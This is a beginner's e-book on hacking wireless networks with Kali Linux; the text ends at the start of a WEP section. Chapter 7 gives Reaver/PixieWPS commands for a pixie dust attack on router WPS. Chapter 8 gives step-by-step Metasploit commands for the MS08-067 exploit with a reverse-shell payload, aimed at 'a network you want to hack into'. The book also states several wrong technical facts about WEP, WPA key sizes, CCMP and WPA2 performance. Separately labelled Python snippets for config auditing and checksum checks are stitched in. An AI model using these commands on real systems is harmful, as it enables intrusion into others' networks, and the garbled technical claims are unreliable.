WIRELESS HACKING
HOW TO HACK WIRELESS NETWORKS, A STEP-BY-STEP GUIDE FOR BEGINNERS
JAMES SQUIRES
CONTENTS
1. Hacking: How to Hack Wireless WEP/WPA/WPA2 Networks in 2 Hours: A Step-by-Step Guide for Beginners
2. What Is Kali Linux?
3. What Is a WEP, a WPA, and a WPA2?
4. Downloading Kali Linux
5. How to Set Up and Install Kali Linux on a USB Key
6. Virtualization and Using VirtualBox
7. Using PixieWPS with Kali Linux
8. Step-by-Step Guide to Running and Using Kali Linux
9. Hacking WPA and WPA2
10.
11.
© Copyright 2016 - All rights reserved.
In no way is it legal to reproduce, duplicate, or transmit any part of this document in either electronic means or in printed format. Recording of this publication is strictly prohibited and any storage of this document is not allowed unless with written permission from the publisher. All rights reserved.
The information provided herein is stated to be truthful and consistent, in that any liability, in terms of inattention or otherwise, by any usage or abuse of any policies, processes, or directions contained within is the solitary and utter responsibility of the recipient reader. Under no circumstances will any legal responsibility or blame be held against the publisher for any reparation, damages, or monetary loss due to the information herein, either directly or indirectly.
Respective authors own all copyrights not held by the publisher.
Legal Notice:
This book is copyright protected. This is only for personal use. You cannot amend, distribute, sell, use, quote or paraphrase any part or the content within this book without the consent of the author or copyright owner. Legal action will be pursued if this is breached.
Disclaimer Notice:
Please note the information contained within this document is for educational and entertainment purposes only. Every attempt has been made to provide accurate, up to date and reliable complete information. No warranties of any kind are expressed or implied. Readers acknowledge that the author is not engaging in the rendering of legal, financial, medical or professional advice.
By reading this document, the reader agrees that under no circumstances are we responsible for any losses, direct or indirect, which are incurred as a result of the use of information contained within this document, including, but not limited to, errors, omissions, or inaccuracies.
INTRO
How To Hack Any Wireless Network! A Step By Step Guide For Beginners
By James Squires
1
HACKING: HOW TO HACK WIRELESS WEP/WPA/WPA2 NETWORKS IN 2 HOURS: A STEP-BY-STEP GUIDE FOR BEGINNERS
The mention of the word “hacking” brings to mind all sorts of illegal activity, so let’s get a disclaimer out of the way first of all. We are not supporting any illegal activity whatsoever. The hacking methods presented in this book are intended to be used by information security professionals and network security personnel. You should only be using this information in a way that is legal in your location.
Network hacking should only be performed on networks that you have permission to perform hacking on. You will want to check to make sure that it is legal for you to do so in the city, state and country where you live.
The methods presented in this book are meant to be used to check for security leaks, to strengthen security networks and to help private networks operate more smoothly.
Now that we’ve gotten the legal essentials out of the way, let’s talk about how you will go about hacking your network. If you want some guidance beyond what is covered in this book, check out the additional resources. There you will find instructions on how to receive free videos delivered straight to your inbox. Just enter your email address on the site, and we will send you free step-by-step videos to help you out with all sorts of common operating system problems. You’ll learn some new tricks and be able to better control the operating system and keep your security tight.
Getting to Know Linux
In order to use the tools we’ll be talking about, you need to have a basic understanding of Linux. Linux is an open source operating system, which means that anyone can modify it or distribute it. It’s free to use and download, but specialty Linux programs, developed by various corporations to be used for more specific purposes, can cost you. The developers will sell those modified Linux systems to whoever is interested in them. So while Linux is free, if you want something different than the vanilla Linux system, you may have to pay for it.
Linux is a lot like Windows, in that it is an operating system. It basically allows all the programs on your computer to work together under a unified system. Without an operating system, you can’t use the programs on your computer. But Linux can work practically anywhere - on your phone, tablet or even your wristwatch. It is constantly changing too, being updated and modified by developers and companies all over the world. New versions of Linux come out more often than any other operating system, so it’s a good idea to familiarize yourself with the latest version before you get too far into some of the tools we will be using.
Our Approach to Hacking a Network
Using the step-by-step guides we have laid out for you in this book, you can learn how to hack into a wireless network, and you’ll be able to do it in as little as two hours. It may not be a very simple process, but we will simplify it for you as much as possible. We’re going to assume you are new to all of this and that you don’t know all the terminology and processes. That way, this book can be used by practically anybody. If you already understand some of the steps, then you may want to skip ahead to the part of the process that is giving you trouble. We’re going to go slowly through all this to make sure you fully understand it and that you have no problems getting into your network.
Live Operating Systems
A live operating system is one that is portable. It can be downloaded onto a USB drive or a DVD. You might hear it called an “OS (operating system) on a stick” or even a “computer on a stick”. This basically means that it can be taken anywhere on a USB stick. The operating system can function much like a computer sometimes, even holding files and programs, so you can essentially take your computer with you.
If you plug that live operating system into the USB port on a computer that is already running Windows or Mac OS or UNIX, then it will still be able to use the operating system you have on the stick. In this case, we are talking about Linux or a version of Linux. Once you plug your USB stick in or insert your DVD, the operating system contained on that portable media will temporarily override whatever operating system is currently in use on the computer. It won’t make any permanent changes to that operating system. It just takes over for a while. Once you remove your media, then your operating system goes with it and the computer, phone, tablet, etc. can just go back to normal.
Now, this is really useful when you are trying to perform security checks on computers that run on your company’s network. If you are in charge of network security, you may need to check individual computers, but you want your programs and files to be accessible through that computer so you can perform diagnostics. The live operating system is the perfect solution for that, and it allows you to take what you know and what you are familiar with and use it anywhere.
We’re going to show you how to do that.
2
WHAT IS KALI LINUX?
Now we talked about versions of Linux that are modified by companies or various developers for specified use. That’s what Kali Linux is, and it is specialized to provide network security. In some ways, it is very basic. It won’t work with a lot of programs, because it isn’t meant to provide general operating system services. It doesn’t work quite like Windows or even the basic Linux system. Instead, it is laser focused on network security.
We will be using Kali Linux in our hacking guides, so we’re going to cover what it’s all about.
How to Get Kali Linux
While Kali Linux is used by security professionals all over the world and is a highly specialized version of Linux, it won’t cost you anything. The developers vow that it will always be free, even as they continue to provide support and updates for their version of Linux. They also make sure that modifications are not being made to the OS by just anyone. They call Kali Linux an open source OS, but one that is developed by a small group of people under very tight security. They vet all changes carefully and make sure that absolute security is maintained on the product.
You only want to download Kali Linux from a verified source. The following pages
https://www.kali.org/downloads
https://www.offensive-security.com/kali-linux-
both offer secured versions of Kali for you to download.
What Kali Linux Does
This kind of operating system is known as a distribution and it is designed for penetration testing and security auditing. It is meant for a single user at a time. This limits the potential for security breaches.
In fact, this system is very particular about security, since it is designed for people who work in information and network security. It can be modified to allow for more users and to become compatible with many programs, but that isn’t advisable. That can compromise the security of the system, which defeats its purpose.
It is recommended that you work within the parameters of the Kali Linux system so as not to allow in any potential security breaches. Because it is such a closed system, it won’t be compatible with programs that permit a lot of online interactions or open sourcing. So Steam won’t work with it at all, nor will Launchpad and many other commonly used programs. If you want to run those programs, then you should really use a different operating system that isn’t designed to be as narrowly focused as this one is.
If you try to install additional programs on Linux that connect to a network, such as Bluetooth, then you won’t have much luck. These kinds of services are disabled under the default settings used by Kali Linux. The distribution is intended to remain secure, and unless you tamper with the settings it will stay that way, even to the detriment of the programs you want to use on it.
You can tamper with the program as much as you like, opening it up for compatibility with just about anything, since it runs off of Linux. But that’s not a good idea if you want to maintain security. As you get more used to how it works, you can do more with it and modify it as you like, but when you first start out, you probably shouldn’t try to tamper with it. Wait until you are more familiar with it to start doing high-level modifications.
3
WHAT IS A WEP, A WPA, AND A WPA2?
Your Wi-Fi network is what connects all your internet-capable devices together in one area. In an office building, that network connects all the computers, scanners, tablets and other devices. This can give them a measure of shared security, as it makes it difficult for outside forces to penetrate and become part of the network. It conserves resources and helps the company maintain control over their computers’ security.
But how secure is your network? That will partly depend on what kind of security classification your Wi-Fi has. We are going to look at three types of these - WEPs, WPAs and WPA2s.
If you are reading this chapter, then you probably never paid much attention to the few letters beside your Wi-Fi network’s name. You may not have thought they mattered, but somebody had to pick one of these choices when they first set up the wireless network you are using. Odds are, they didn’t think too much about their choice and just went with the most obvious one.
But that can be a mistake. These encryption standards determine how secure your network is. If someone is getting into your system and using your Wi-Fi to do something illegal, then the FBI are going to be having a visit with you. They may get to the actual infiltrator eventually, but they will start with the Wi-Fi source. Knowing how to keep out intruders is a big part of running a secure network. Before you can do that, you first have to understand the security classifications for Wi-Fi networks.
WEP
Wired Equivalent Privacy, or WEP, is the Wi-Fi security algorithm that is used in most places around the world. Part of that has to do with how long it has been around, and a part of it is just because it is usually the first choice in a list of security algorithms. People who don’t know much about these just assume that the first choice is the best, which is why it is considered the default option. They don’t understand what the difference is between these choices.
WEP became the standard back in 1999, but it was never very strong. As technology advanced, stronger versions of WEP were introduced, but most of the time, the majority of people were still using the relatively weak versions.
This standard lost its value over time as weaknesses were discovered. When computing power increased to the point where it became a simple matter to break the encryption and discover the Wi-Fi password, WEP was dropped as the standard by the Wi-Fi Alliance in 2004.
WPA
Wi-Fi Protected Access, or WPA, was meant to replace WEP as it began to show signs of weakness. The Wi-Fi Alliance formally adopted it in 2003. All WPA keys that are used are 256-bit, which makes them much stronger than the keys commonly used in WEPs (64 and 128-bit). The keys refer to the level of encryption the system has, and WPA’s was remarkably stronger than its counterpart.
WPAs have message integrity checks which look for packets of data that have been altered or captured by an infiltrator as these packets pass between the client and the access point. The key system is even a lot more advanced than what was being used before. The original key system that came with the WPA is outdated now, but at the time, it was a huge leap forward for network security.
But the WPA has some security flaws. It came with some of the same capabilities as its predecessor, including TKIP (Temporal Key Integrity Protocol), which required that the device accept firmware updates regularly. This presented a backdoor for the system, which hackers were soon able to exploit.
The WPA is more secure than its predecessor, but it is also still vulnerable to attack. This has been shown time and again in public demonstrations. Even though it is harder to break into, and supplementary systems usually serve as the access point for intruders rather than the algorithm directly, the vulnerability is still there.
WPA2
Wi-Fi Protected Access 2, or WPA2, took over for the standard WPA back in 2006. That’s not to say that the older, less secure algorithms aren’t still available, because they are.
The WPA2 still uses TKIP, but it is considered a fallback system to be used only if the primary system fails. What replaces TKIP is the CCMP, or Counter Cipher Mode with Block Chaining Message Authentication Code Protocol. This new protocol is excellent at determining if messages entering the algorithm are authorized, making it very difficult to infiltrate the system.
This system still has its weaknesses, but they are far fewer and much harder to exploit. Because this kind of algorithm is so incredibly difficult to penetrate, the only entities who use it that would have to worry about infiltration are large companies that deal with corporate espionage. It simply isn’t worth the effort it would take to break into this system for the information contained on the average private network.
AES
We can’t talk about WEP, WPA and WPA2 without mentioning AES. It stands for Advanced Encryption Standard, and it is a specification of a security algorithm. Often, AES is included in a WPA2 algorithm, but it may not always be by default. For the very best security, you want to partner a WPA2 security algorithm with AES. That will give you unprecedented levels of security and make your network practically impenetrable.
Which One Should You Use?
If you have the resources and the processing power to handle it, you definitely want to go with a WPA2 security algorithm, preferably with AES activated as well. But not everyone will have that kind of processing power available to them.
If you don’t have much processing power or resources at your disposal, then using a WPA2 security algorithm on something like a small, personal network would not be advisable. It can lower your connection speeds, create performance problems and unnecessarily bog down your system.
For any enterprise-level networks, however, WPA2 with AES is recommended. It provides the most security, and most medium to large businesses have the necessary resources to run it smoothly without any hiccups in their internet speed.
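As an added example (it is not code from the book, and the configuration lines are constructed samples in the key=value format the hostapd access-point daemon uses), here is a small Python audit that reads an access point’s settings and flags the choices this chapter warns against: WEP keys, WPA with TKIP, a WPA2 network that does not list CCMP (AES), an open network, and WPS left switched on.

```python
"""Flag weak Wi-Fi security settings in a hostapd-style configuration.

Added example, not the book's own code.  It reads key=value lines in the
format hostapd uses and reports the choices the chapter warns against:
WEP, WPA (TKIP), WPA2 without CCMP (AES), open networks and WPS.
Both sample configurations below are constructed for the demonstration.
"""
from typing import Dict, List

# Constructed sample: an access point left on the "first choice" the chapter
# describes (WEP), with WPA version 1 and TKIP on top of it.
WEAK_CONFIG = """\
interface=wlan0
ssid=OfficeNet
wep_default_key=0
wep_key0=0123456789
wpa=1
wpa_key_mgmt=WPA-PSK
wpa_pairwise=TKIP
"""

# Constructed sample: the chapter's recommendation, WPA2 with AES (CCMP) only.
HARDENED_CONFIG = """\
interface=wlan0
ssid=OfficeNet
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=correct-horse-battery-staple
"""


def parse_config(text: str) -> Dict[str, str]:
    """Turn key=value lines into a dict, skipping blank lines and # comments."""
    settings: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        settings[key.strip()] = value.strip()
    return settings


def audit(text: str) -> List[str]:
    """Return one finding per weak setting; an empty list means WPA2 with CCMP only."""
    cfg = parse_config(text)
    findings: List[str] = []
    wpa_mode = cfg.get("wpa", "0")  # hostapd: 0 = none, 1 = WPA, 2 = WPA2, 3 = both

    if any(k.startswith("wep_key") or k == "wep_default_key" for k in cfg):
        findings.append("WEP keys configured: WEP was retired in 2004 and is trivially broken")
    if wpa_mode == "0" and not findings:
        findings.append("No WPA/WPA2 and no WEP: the network is open")
    if wpa_mode in ("1", "3"):
        findings.append("WPA (version 1) allowed: clients may negotiate the weaker TKIP suite")
    # wpa_pairwise applies to WPA, rsn_pairwise to WPA2; check both cipher lists.
    ciphers = (cfg.get("wpa_pairwise", "") + " " + cfg.get("rsn_pairwise", "")).split()
    if "TKIP" in ciphers:
        findings.append("TKIP cipher allowed: prefer CCMP (AES) only")
    if wpa_mode in ("2", "3") and "CCMP" not in ciphers:
        findings.append("WPA2 enabled without CCMP (AES) listed: add rsn_pairwise=CCMP")
    if cfg.get("wps_state", "0") != "0":  # 0 = WPS disabled in hostapd
        findings.append("WPS enabled: the WPS PIN exchange is the weak point this book describes")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit(text) or ["no findings"])
```

Running it prints three findings for the weak configuration and none for the hardened one; the same function can be pointed at a real hostapd.conf read from disk.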
4
DOWNLOADING KALI LINUX
You have to be very careful about where you download Kali Linux from. There are plenty of facsimile versions out there that are not made by the original developers. It would be very easy for an unscrupulous individual to slip in a virus or some other malware that could compromise your network. That’s why you have to make sure you are getting not only a “pure” copy of the operating system but also that you are downloading it from a trustworthy source.
The best way to certify that what you are getting is the real deal is to verify the SHA1 checksums against a standard value.
If you want to run the Kali Linux OS from a USB (which is necessary to hack a network) then you will need to obtain a bootable ISO image. A 32-bit or a 64-bit image will work fine.
You may not be quite sure what architecture your system has that you want to run the system on. If that’s the case, then you can run the command “uname -m”. Just input this on the command line on your Intel-based PC. A response will come back. If it says “x86_64” then you should be using the 64-bit image. That one will have “amd64” in the name of the file.
You might get the response “i386”. If that is the case, then use a 32-bit image. This will have “i386” in the file name.
If you have a Windows OS, then the procedure will be a bit different. For Windows 7 or Windows Vista users, you can begin by opening the Start menu. Go to Computer, then click on Properties. Under the System heading, view the type of system that you have.
For a Windows XP OS, the steps are similar. Go to Start to begin. Then right-click on My Computer and click Properties from there. If you see the words “x64 edition” there, then you have a 64-bit system. If nothing is written there, then it’s a 32-bit system.
Kali can be run as a guest under VMware. It actually already has VMware Tools installed and can be found as a pre-built VMware virtual machine. If you want the VMware image, you will find there are three variations - 64-bit, 32-bit and 32-bit PAE.
ARM-based devices can have varied architectures. That means that a single type of image won’t work across all the ARM machines. You’ll have to download Kali Linux images that are pre-built for ARM architecture. You can go to GitHub to find scripts that will help you build ARM images on your own.
If you run into any trouble setting up an ARM environment that will work for Kali Linux or you want to know how to build your own custom chroot (a root directory change operation), you can use these articles
http://docs.kali.org/development/kali-linux-arm-chroot
The Kali Linux images can be found on the Offensive Security website: OffensiveSecurity.com.
Verify the Image You Use for Kali Linux
You definitely want to make sure that you have an actual Kali Linux OS and not some imposter. This professional penetration testing tool is meant to maintain network security. You can use it to investigate computers and networks, and you need to be able to trust what it tells you. If there is any problem with it and you have a version of Kali Linux that differs from the real deal, then you can be compromising your network and your personal information. Don’t take that risk. Make sure you verify what you are getting before you download it.
Since Kali is a penetration testing distribution, a fake version of it could cripple your system. There are lots of these bogus versions out there and there is no shortage of people who would want to put in some sketchy additions to this distribution.
The best way to avoid this problem is to make sure you are downloading only from the official Kali download pages. You will need an SSL to browse these pages. That’s a standard encryption that protects the server and the client from interference. It basically keeps the bad guys out. But even these sources have their weaknesses.
After you download the necessary image, be sure to verify it before you run it. You want to validate that it is the real deal and not something that could contain malware.
The simplest way to do this is to calculate the ISO’s SHA1 hash. Then just inspect it and compare it against the value you find on the Kali Linux site.
Once you’ve done all this, and you are sure you are getting an actual Kali Linux distribution, you can then download it.
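The verification this chapter describes, as an added Python example (it is not code from the book or from the Kali project): hash the downloaded image in chunks and compare the result with the published checksum list. The algorithm is a parameter because this chapter names SHA1 while the current Kali download pages publish SHA256 sums. The stand-in image file and the checksum lines are constructed for the demonstration, and “kali-sample.iso” is a made-up file name.

```python
"""Verify a downloaded Kali ISO against its published checksum.

Added example, not the book's own code.  It does what the chapter
describes: hash the image file and compare the result with the value
published on the download page.  The hash algorithm is a parameter
because the book names SHA1 while current Kali download pages publish
SHA256 sums.  The sample file below stands in for an ISO and is
constructed for the demonstration.
"""
import hashlib
import hmac
import os
import tempfile
from typing import Dict

CHUNK = 1024 * 1024  # read 1 MiB at a time so a multi-GB ISO never sits in RAM

# Constructed stand-in for a downloaded image: a small file containing "abc".
_SAMPLE_DIR = tempfile.mkdtemp()
SAMPLE_ISO = os.path.join(_SAMPLE_DIR, "kali-sample.iso")
with open(SAMPLE_ISO, "wb") as fh:
    fh.write(b"abc")

# Constructed copies of a published checksum list in sha256sum/sha1sum
# format ("<hex digest>  <file name>").  The digests are the real SHA256
# and SHA1 of the three bytes "abc".
SHA256SUMS = "ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad  kali-sample.iso\n"
SHA1SUMS = "a9993e364706816aba3e25717850c26c9cd0d89d  kali-sample.iso\n"


def file_digest(path: str, algo: str = "sha256") -> str:
    """Hex digest of a file, streamed in chunks."""
    h = hashlib.new(algo)
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(CHUNK), b""):
            h.update(block)
    return h.hexdigest()


def parse_sums(text: str) -> Dict[str, str]:
    """Parse 'digest  filename' lines into {filename: digest}."""
    table: Dict[str, str] = {}
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            digest, name = parts
            # GNU sha*sum prefixes the name with '*' when it hashed in binary mode.
            table[name.strip().lstrip("*")] = digest.lower()
    return table


def verify_image(path: str, sums_text: str, algo: str = "sha256") -> bool:
    """True only if the file's digest matches the entry listed for its file name."""
    expected = parse_sums(sums_text).get(os.path.basename(path))
    if expected is None:
        return False  # no published value for this file name: treat as unverified
    actual = file_digest(path, algo)
    # Constant-time comparison; a habit more than a need, since both values are public.
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    print("sha256 ok:", verify_image(SAMPLE_ISO, SHA256SUMS))
    print("sha1 ok:", verify_image(SAMPLE_ISO, SHA1SUMS, "sha1"))
```

On a real download, replace SAMPLE_ISO with the path to the image and SHA256SUMS with the contents of the checksum file fetched from the official download page; a False result means the image should not be written to a USB key.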
5
HOW TO SET UP AND INSTALL KALI LINUX ON A USB KEY
Kali Linux is the best hacking tool out there. It is super secure, and it is made by seasoned professionals who know what they are doing. What’s so great about this system is that you can run it from a USB key and not have to worry about compromising or altering your current operating system. When you carry this OS on a USB key, it can be taken to any computer or compatible device and made to work. It only temporarily overrides the current operating system on that device.
Once you take out your USB key, you remove Kali Linux from the device. It doesn’t leave behind any trace, and it doesn’t change the settings or operating system of the device you used it on. It is compatible with any operating system because it works around them.
This is considered a non-destructive way to use Kali Linux. It lets everything go back to normal on whatever device you use it on, making no changes to the host’s system. It’s also portable, so you can take it from one workstation to the next and from one device to the next and do what you need to do. It starts up very fast, usually in just a few minutes, on whatever system you put it into.
You can also customize your bootable drive, using a Kali Linux ISO image that you rolled yourself. It is also potentially persistent. This means that, once you perform the proper configurations, your Kali Linux Live drive will keep the data it has collected no matter how many times you reboot it.
Installing onto Your Bootable USB Key
We will start with a bootable USB drive that already has an ISO image of Kali Linux. Be sure that ISO image is verified. We talked about this in the last chapter.
For Windows users, you will have to first download the Win32 Disk Imager utility. You’ll find that at:
https://launchpad.net/win32-image-writer
If you are using a Linux or an OS X, just use the dd command. This has already been installed on both of those platforms.
We recommend using a 4GB USB thumb drive or larger. If you want to use an SD card, then that’s fine, since the procedure is the same for both. Just make sure the devices you are going to be using it on are compatible with your storage device.
The method for doing this will differ depending on what OS you have. We’ll break it down on both of the major ones for you.
For Windows
Start by plugging your USB drive into a USB port on a PC operating Windows. Pay attention to the drive designator that it uses when it starts to mount. That designator will look like “F:\”. Then launch the Win32 Disk Imager software. Once you open that software, pick out the Kali Linux ISO file you downloaded. Then click “Write” to copy it onto the USB drive; be sure you pick the right drive for this operation.
When the imaging process is finished, you can take out your USB. On most Windows OS, you will need to click on the small arrow near the bottom right corner of your screen to open a tab that shows connected devices. Be sure to click on your USB drive there to safely eject it and ensure that no information is lost when you disconnect it.
Once all that is done, you can boot Kali Linux from your USB device.
For Linux
Doing the same thing on a Linux is equally easy. Start with the verified ISO image and copy it over to the drive using the dd command. You have to be running as root for this to work. Alternatively, you can execute the dd command using sudo. The instructions we’re going to give you assume that you have a Linux Mint 17.1 desktop. Other versions are going to vary slightly, but the basic operations required for this task should all be about the same.
Just a word of warning before we get into the actual instruction: if you aren’t sure what you are doing with the dd command or you just aren’t careful, you can accidentally overwrite something you aren’t meaning to. Be sure to double check everything you are doing so you don’t make any mistakes.
Start by identifying the device path you are going to use to write the image onto the USB drive. Before the drive is inserted, perform the command “sudo fdisk -l”.
You have to be using elevated privileges with fdisk, otherwise there won’t be any output. Enter the above command in a terminal window at a command prompt. If you did it properly, you should see a single drive. That will probably look like this: “/dev/sda”. That drive will be separated into three partitions. These are /dev/sda1, /dev/sda2, and /dev/sda5.
From there, plug in the USB drive, then run the original command again. That’s “sudo fdisk -l”. Once you do that, you will see another device that wasn’t there initially. It could look something like this: “/dev/sdb”.
Then take the ISO file and image it onto the USB device. It may take 10-15 minutes to image the USB device, so be patient. In order to perform this process, you need to execute the command below:
dd if=kali-linux-1.0.9a-amd32.iso of=/dev/sdb bs=512k
Let’s dissect this command for a second. In the example we are using here, the ISO image that you want to write onto the drive is named “kali-linux-1.0.9a-amd32.iso”. Yours may look slightly different. Note the “32” in the name. This refers to the size of the image. We use the block size value “bs=512k” because it is safe and reliable. You can make it bigger if you want, but that can cause some problems, so it isn’t recommended.
Once the command is completed, then it will provide feedback and not before then. Your drive could have an access indicator. If it does, then it will blink every so often. How long this whole process takes will depend on a few factors - how fast your system is, what kind of USB drive you are using and how well your USB port works. The output, once the imaging is complete, will tell you how many bytes are copied and give you numbers for records in and out, which should be the same number.
Now your USB is ready to boot into a Kali Live environment.
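As an added example (not the book’s own code), the before-and-after comparison this chapter describes, done in Python: it parses two captures of “sudo fdisk -l” output, picks out the one disk that appeared after the USB drive was plugged in, and only then builds the dd command, so a disk that was already listed before the plug-in can never end up as the “of=” target. The fdisk listings are constructed samples; “status=progress” is a GNU dd option that prints copy progress, which the book’s own command does not use.

```python
"""Identify the USB key before running dd, as the chapter describes.

Added example, not the book's own code.  The chapter has you run
`sudo fdisk -l` before and after plugging the drive in and pick the
device that is new.  This script does that comparison on two captured
outputs and only builds the dd command for a device that appeared
after the plug-in, so the internal disk (/dev/sda) can never be the
target.  The fdisk outputs below are constructed samples.
"""
import re
import shlex
from typing import List, Set

# Constructed sample: fdisk -l before inserting the USB drive (one disk, three partitions).
FDISK_BEFORE = """\
Disk /dev/sda: 238.5 GiB, 256060514304 bytes, 500118192 sectors
Device     Boot     Start       End   Sectors   Size Id Type
/dev/sda1  *         2048 498071551 498069504 237.5G 83 Linux
/dev/sda2       498073598 500117503   2043906  998M  5 Extended
/dev/sda5       498073600 500117503   2043904  998M 82 Linux swap / Solaris
"""

# Constructed sample: the same command after the drive is plugged in.
FDISK_AFTER = FDISK_BEFORE + """\

Disk /dev/sdb: 7.5 GiB, 8004304896 bytes, 15633408 sectors
Device     Boot Start      End  Sectors  Size Id Type
/dev/sdb1        2048 15633407 15631360  7.5G  c W95 FAT32 (LBA)
"""

# Whole-disk header lines look like "Disk /dev/sdX: ..."; partition rows do not start with "Disk".
_DISK_LINE = re.compile(r"^Disk (/dev/\S+):", re.MULTILINE)


def list_disks(fdisk_output: str) -> Set[str]:
    """Whole-disk device paths (not partitions) named in fdisk -l output."""
    return set(_DISK_LINE.findall(fdisk_output))


def new_disks(before: str, after: str) -> Set[str]:
    """Disks present in the second listing but not the first."""
    return list_disks(after) - list_disks(before)


def build_dd_command(iso: str, before: str, after: str, bs: str = "512k") -> List[str]:
    """Return the dd argv for the single new disk; refuse if the choice is not unambiguous."""
    candidates = new_disks(before, after)
    if len(candidates) != 1:
        raise ValueError(f"expected exactly one new disk, found {sorted(candidates)}")
    target = candidates.pop()
    # status=progress is a GNU dd operand that reports bytes copied while it runs.
    return ["dd", f"if={iso}", f"of={target}", f"bs={bs}", "status=progress"]


if __name__ == "__main__":
    argv = build_dd_command("kali-linux-1.0.9a-amd32.iso", FDISK_BEFORE, FDISK_AFTER)
    print("run as root:", shlex.join(argv))
```

In practice the two listings come from running the command twice and saving the output; the script never runs dd itself, it only prints the command so the device path can be checked once more before it is executed as root.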
6
VIRTUALIZATION AND USING VIRTUALBOX
Kali Linux lets you use its own operating system without interfering with the original operating system on whatever computer or other device you are trying to hack into. We’ve covered this already, but what about those instances where you want to test programs that are not compatible with one OS or another?
That’s where virtualization comes in handy. It allows you to set up an outside system that works with the existing operating system. Then you can just pick and choose which program you want to test. You can take a program that works only on Windows, for example, and run it through your Kali Linux distribution while you have your USB with Kali Linux plugged into the host device. But you will need a virtualization program.
That’s what VirtualBox is, and it does a lot more than just let you test specific programs that wouldn’t normally be compatible with the OS you are using. It also allows you to run operating systems that no longer work on your current hardware. Your computer may not be able to run an old DOS operating system, but when you use a virtualization tool like VirtualBox, you can run that operating system again.
You can also run multiple operating systems at once. We talked about how Kali Linux temporarily overrides the operating system of whatever device you have it plugged into. But once you have VirtualBox running, you can essentially have both Kali Linux and that host operating system going at the same time. It gives you lots more options, allowing you to do far more than you could otherwise.
You can also save the state of a system and make that system revert to its old state whenever you want. That gives you tons of room to play around with. You can experiment and try different things, then when you make a fatal error, you can just revert the system.
VirtualBox can be found on VirtualBox.org. It is an open source tool, so it is constantly being updated and it’s free. Like with all the other tools we cover in this book, you only want to download it from the original source. If you get it anywhere else, it could be a bogus version that is corrupted with malware.
VirtualBox is compatible with just about any operating system, so you shouldn’t have any trouble getting it to work with whatever you have. The limits of VirtualBox come down to your processing power and memory. You can run as many virtual machines inside your device as you have memory for. You can also have as many programs running concurrently from as many operating systems as your device can handle.
If you have not done much hacking before, then VirtualBox is an indispensable tool. You can save your computer’s current state to restore it later in case something happens. Individuals who try hacking for the first time on their computer often make mistakes they wish they could take back. Using a VirtualBox, they actually can.
This tool can be added to your USB drive and work in conjunction with Kali Linux, so it’s no problem to take it with you where you need to go.
7
USING PIXIEWPS WITH KALI LINUX
The latest versions of Kali Linux already come prepackaged with a program called PixieWPS. It works really well with Kali Linux and is an obvious partner for it.
What PixieWPS does is perform an attack on a network. It guesses the pin number or password for the network. This is something that had to be done manually in the past, but thanks to PixieWPS it is now automated. This attack, called a pixie dust attack, can guess most network passwords in as little as 1 second and as much as 30 seconds. How long the process takes will depend on the network’s security.
The PixieWPS tool actually came into existence out of the Kali Linux forums, so its entire history has been linked to this distribution.
If you don’t have PixieWPS on your Kali Linux distribution, then you are probably running an older version. You can simply use the following command to get an update for that program and start running the current one with PixieWPS included: “apt-get update”.
Running PixieWPS
Generally, PixieWPS works best with Reaver, which is a complementary program that aids in the offline network attack. We’re going to assume you have Reaver installed with your Kali Linux for this guide.
In order to obtain Reaver, you can go to GitHub and download it - that is, if you don’t already have it. Like PixieWPS, Reaver should already be installed on the latest version of Kali Linux. This open source tool uses a brute force approach to hacking into a Wi-Fi network. PixieWPS helps refine its approach and ensure that it doesn’t take very long to get the desired results - namely, access to the network.
Now, Reaver will sometimes time out or get stuck in a loop. It will just do the same thing over and over again. When this happens, you should just let it run. It will eventually work itself out. Make sure you keep it close to the router so it doesn’t have any trouble accessing the network.
If you feel like the pixie dust attack is taking longer than you would like, you can always come back later. Just pause the program with Ctrl+C. This will save your progress, and you can come back later and start back right where you left off. Sometimes, there are factors that prevent the attack from being completed in the usual 30-second time frame. There may be network problems, compatibility issues or other problems that are hindering your progress. Just know that you don’t have to perform the entire attack in one go.
Once you have all the requisite programs on Kali Linux, you can launch a pixie dust attack pretty easily. Just put your interface into monitor mode. You do that with the command “airmon-ng start”. Then you can start looking for a target. Use the command “wash -i” on the monitor interface.
You will need the BSSID (individualized router number) and channel number of the router before you begin the attack. You also want to make sure your signal is strong.
You can launch your attack by entering the command “reaver -i (monitor interface) -b (BSSID of the router) -c (the router’s channel number) -vvv -K 1 -f”.
That should give you the password shortly. This isn’t something that will work on every router, but most of them should be susceptible to it. Using PixieWPS is almost always more effective than some sort of brute force tactic, and it works lots faster.
8
STEP-BY-STEP GUIDE TO RUNNING AND USING KALI LINUX
Once you have Kali Linux downloaded and you are near a network you want to hack into, you can start the hacking process. Below are a few step-by-step guides on how to do it.
Basic Hack for Older Windows Systems
We’re going to start with a very basic hack that works on many older operating systems. It might not be the most practical one, but it’s a good starting hack for beginners. With this hack, you can get a good sense of what is involved and work up from there.
1. Start up Kali Linux and open a new terminal up.
2. Then start up Metasploit. This is a program that is already included on Kali Linux. It will perform an attack on the network. You can start it up by typing in “msfconsole” as a command. This may take a few minutes, so be patient.
3. Once Metasploit starts up, you can type in some commands that will progress the hack. Here they are in order:
“use windows/smb/ms08_067_netapi”
“set PAYLOAD windows/meterpreter/reverse_tcp”
“set LHOST (your IP address)” [You might not know what your IP address is. You can find out by just opening up a new terminal and typing in the command “ifconfig”. You’ll see your IP address in the output.]
“set LPORT 4444”
“set RHOST (the IP of the target network)”
“set RPORT 445”
“exploit”
Once you do all that, you should connect. If you aren’t sure what to do or what commands are available to you, just type in “help” and a list of commands will be displayed.
4. Now you are in. You’ve successfully hacked the computer, and you can check for network weaknesses or whatever else you need to.
There is a good chance that this exploit won’t work. If the target network has blocked port 445, then you will need to use a different tactic. Also, some newer versions of Windows will automatically block this exploit. That’s okay, because we have some more methods of hacking for you to use.
General WEP Hack
This next hack is going to be more useful for current operating systems and networks. Here we go:
